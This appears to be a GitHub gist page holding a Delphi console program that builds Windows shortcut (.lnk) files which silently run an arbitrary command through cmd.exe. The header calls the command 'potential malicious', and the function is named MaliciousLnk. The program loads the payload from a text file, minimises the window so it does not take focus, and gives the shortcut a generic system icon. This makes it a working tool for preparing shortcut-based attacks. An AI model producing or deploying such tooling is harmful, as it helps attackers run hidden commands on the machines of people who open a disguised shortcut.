Last active
April 3, 2021 13:21
Revisions
-
DarkCoderSc renamed this gist
May 14, 2018 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
DarkCoderSc created this gist
May 14, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,72 @@ {-----------------------------------------------------------------------------------------------------------------------} { PHROZEN SAS (c) 2018 - www.phrozen.io } { Jean-Pierre LESUEUR (jplesueur@phrozen.io) } { } { Create a Windows Shortcut by code and inject a potential malicious single line command, for post extraction and } { execution. } {-----------------------------------------------------------------------------------------------------------------------} program Shortcut_gen; {$APPTYPE CONSOLE} uses System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes; function MaliciousLnk(cmd, destPath : String) : Boolean; var cObject : IUnknown; shellLink : IShellLink; PFile : IPersistFile; begin result := false; CoInitialize(nil); try cObject := CreateComObject(CLSID_ShellLink); shellLink := cObject as IShellLink; PFile := cObject as IPersistFile; cmd := '/C "' + cmd + '"'; shellLink.SetDescription('@DarkCoderSc'); shellLink.SetPath('cmd.exe'); shellLink.SetArguments(PWideChar(cmd)); shellLink.SetShowCmd(SW_SHOWMINNOACTIVE); shellLink.SetWorkingDirectory('%windir%\system32\'); shellLink.SetIconLocation('shell32.dll', 1); result := PFile.Save(PWideChar(destPath), false) = S_OK; finally CoUninitialize(); end; end; var Arg1, Arg2 : String; strList : TStringList; begin try if ParamCount <> 2 then begin writeln('usage:'); writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"'); writeln('- Arg2 : Full path of destination shortcut'); exit; end; Arg1 := ParamStr(1); Arg2 := ParamStr(2); if NOT FileExists(Arg1) then exit; // THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES strList := TStringList.Create; strList.LoadFromFile(Arg1); MaliciousLnk(strList.Text, Arg2); strList.Free; finally writeln(#13#10 + 'Press enter to leave...'); readln; end; end.